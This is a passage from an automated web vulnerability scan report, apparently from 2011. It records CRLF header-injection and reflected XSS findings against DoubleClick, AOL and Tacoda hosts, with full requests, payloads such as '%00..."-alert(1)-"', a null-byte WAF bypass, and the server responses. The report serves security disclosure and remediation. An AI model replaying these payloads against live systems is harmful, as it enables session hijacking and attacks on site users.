2a7290e692e/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died:
Date: Sat, 26 Mar 2011 20:36:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
4.5. http://ad.doubleclick.net/adj/N6036.AOL/B5125476.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6036.AOL/B5125476.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4d9cf%0d%0a87bb4119c15 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4d9cf%0d%0a87bb4119c15/N6036.AOL/B5125476.4;sz=728x90;click=http%3A//at.atwola.com/adlink%2F5113%2F674622%2F0%2F225%2FAdId%3D1349284%3BBnId%3D3%3Bitime%3D171780247%3Bkvugc%3D0%3Bkvpg%3Dmusic.aol%2Fradioguide%2Fbb%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93232707%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D73001%3Bkvseg%3D99999%3A61674%3A60489%3A60740%3A60490%3A56262%3A61576%3A60493%3A50963%3A60491%3A60515%3A60514%3A52614%3A53656%3A52842%3A56830%3A52615%3A60546%3A56918%3A60500%3A56920%3A56555%3A51133%3A56988%3A56917%3A53435%3A54173%3A56500%3A52611%3A54463%3A56969%3Bkp%3D-1%3Bnodecode%3Dyes%3Blink%3D;ord=171780247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4d9cf
87bb4119c15/N6036.AOL/B5125476.4;sz=728x90;click=http: //at.atwola.com/adlink/5113/674622/0/225/AdId=1349284;BnId=3;itime=171780247;kvugc=0;kvpg=music.aol/radioguide/bb;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93232707;kvtid=16lsqii1n1a3cr;kr2703=73001;kvseg=99999:61674:60489:60740:60490:56
Date: Sat, 26 Mar 2011 20:36:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
4.6. http://ad.doubleclick.net/adj/huffpost.politics/longpost [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/longpost

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 47115%0d%0af411b5489be was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /47115%0d%0af411b5489be/huffpost.politics/longpost;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=mid_article;hot=fb;hot=tw;u=300x250%7Cbpage%7Cmid_article%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=300x250;tile=3;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/47115
f411b5489be/huffpost.politics/longpost;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-:
Date: Sat, 26 Mar 2011 20:36:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
4.7. http://ad.doubleclick.net/adj/huffpost.politics/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 234dc%0d%0a00fe8347eca was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /234dc%0d%0a00fe8347eca/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=right_rail_flex;hot=fb;hot=tw;u=300x250,300x600%7Cbpage%7Cright_rail_flex%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=300x250,300x600;tile=5;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/234dc
00fe8347eca/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died:
Date: Sat, 26 Mar 2011 20:36:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
4.8. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f0b8d%0d%0aafccb6f9a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3amail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aANGELIA%7csnt%3aScreenName%7csid%3a187531a0-71f6-4ddd-8234-25df9b0c705b&offerId=newmail-en-us-v2&seamless=novl&f0b8d%0d%0aafccb6f9a=1 HTTP/1.1
Host: my.screenname.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; SNS_LDC=1&-&-&1299520397&1&1299520397&0; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171798825-Repeat%7C1364243798825%3B%20s_nrgvo%3DRepeat%7C1364243798828%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 20:37:23 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://my.screenname.aol.com/_cqr/login/login.psp?f0b8d
afccb6f9a=1&seamless=novl&locale=us&offerId=newmail-en-us-v2&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Amail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AANGELIA%7Csnt%3AScreenName%7Csid%3A187531a0-71f6-4ddd-8234-25df9b0c705b&authLev=0&sitedomain=sns.webmail.aol.com&lang=en
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"

4.9. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 66e42%0d%0aa76191a841c was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=16768&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=94859 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818; TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|60514|52614|53656|52842|56830|52615|60546|56918|60500|56920|56555|51133|56988|56917|53435|54173|56500|52611|54463|56969|56835|54938|61166|56761|56780; N=2:ef750afea1932931347519ba153fff1c,a07761c4014e52e7e1bc39b6a051a86866e42%0d%0aa76191a841c; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=; eadx=2

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:16 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 26 Mar 2011 20:52:16 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 20-Mar-12 20:37:16 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776636; path=/; expires=Sat, 02-Apr-11 20:37:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1301171786^1301173636|16768^1301171786^1301173636; path=/; expires=Sat, 26-Mar-11 21:07:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|60500|56920|56555|56761|56500|56988|52611|53603|54173|53435|54463|56917|56969|56718|56835|56715; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:a07761c4014e52e7e1bc39b6a051a86866e42
a76191a841c,7a83820d0a0dd8c854eabe6c04f3aee3; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3Mzk6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NTY1MTE6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTU0MDE6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTY3NjE6NTY1MDA6NTY5ODg6NTI2MTE6NTM2MDM6NTQxNzM6NTM0MzU6NTQ0NjM=; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 29-Mar-11 20:37:16 GMT; domain=tacoda.at.atwola.com
ntCoent-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|
...[SNIP]...
4.10. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 29cb8%0d%0ab6126af3077 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=29cb8%0d%0ab6126af3077&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=94859 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818; TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|60514|52614|53656|52842|56830|52615|60546|56918|60500|56920|56555|51133|56988|56917|53435|54173|56500|52611|54463|56969|56835|54938|61166|56761|56780; N=2:ef750afea1932931347519ba153fff1c,a07761c4014e52e7e1bc39b6a051a868; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=; eadx=2

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:15 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 26 Mar 2011 20:52:15 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 20-Mar-12 20:37:15 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776635; path=/; expires=Sat, 02-Apr-11 20:37:15 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1301171786^1301173635|16768^1301171786^1301173586|29cb8
b6126af3077^1301171835^1301173635; path=/; expires=Sat, 26-Mar-11 21:07:15 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|60500|56920|56555|56761|56500|56988|52611|53603|54173|53435|54463|56917|56969|56718|56835|56715; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:0cd73208ac57a723a07d874a21de8895,7a83820d0a0dd8c854eabe6c04f3aee3; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3Mzk6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NTY1MTE6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTU0MDE6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTY3NjE6NTY1MDA6NTY5ODg6NTI2MTE6NTM2MDM6NTQxNzM6NTM0MzU6NTQ0NjM=; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 29-Mar-11 20:37:15 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|
...[SNIP]...
5. Cross-site scripting (reflected)  previous  next
There are 149 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

5.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %005f8f3"-alert(1)-"b8b286ead4a was submitted in the adurl parameter. This input was echoed as 5f8f3"-alert(1)-"b8b286ead4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=%005f8f3"-alert(1)-"b8b286ead4a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6985
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 13:14:51 GMT
Expires: Sat, 26 Mar 2011 13:14:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=%005f8f3"-alert(1)-"b8b286ead4ahttp://ads.networksolutions.com/landing?code=P111C519S512N0B2A1D691E0000V101");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "nev
...[SNIP]...
5.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00962c0"-alert(1)-"a036383781d was submitted in the ai parameter. This input was echoed as 962c0"-alert(1)-"a036383781d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

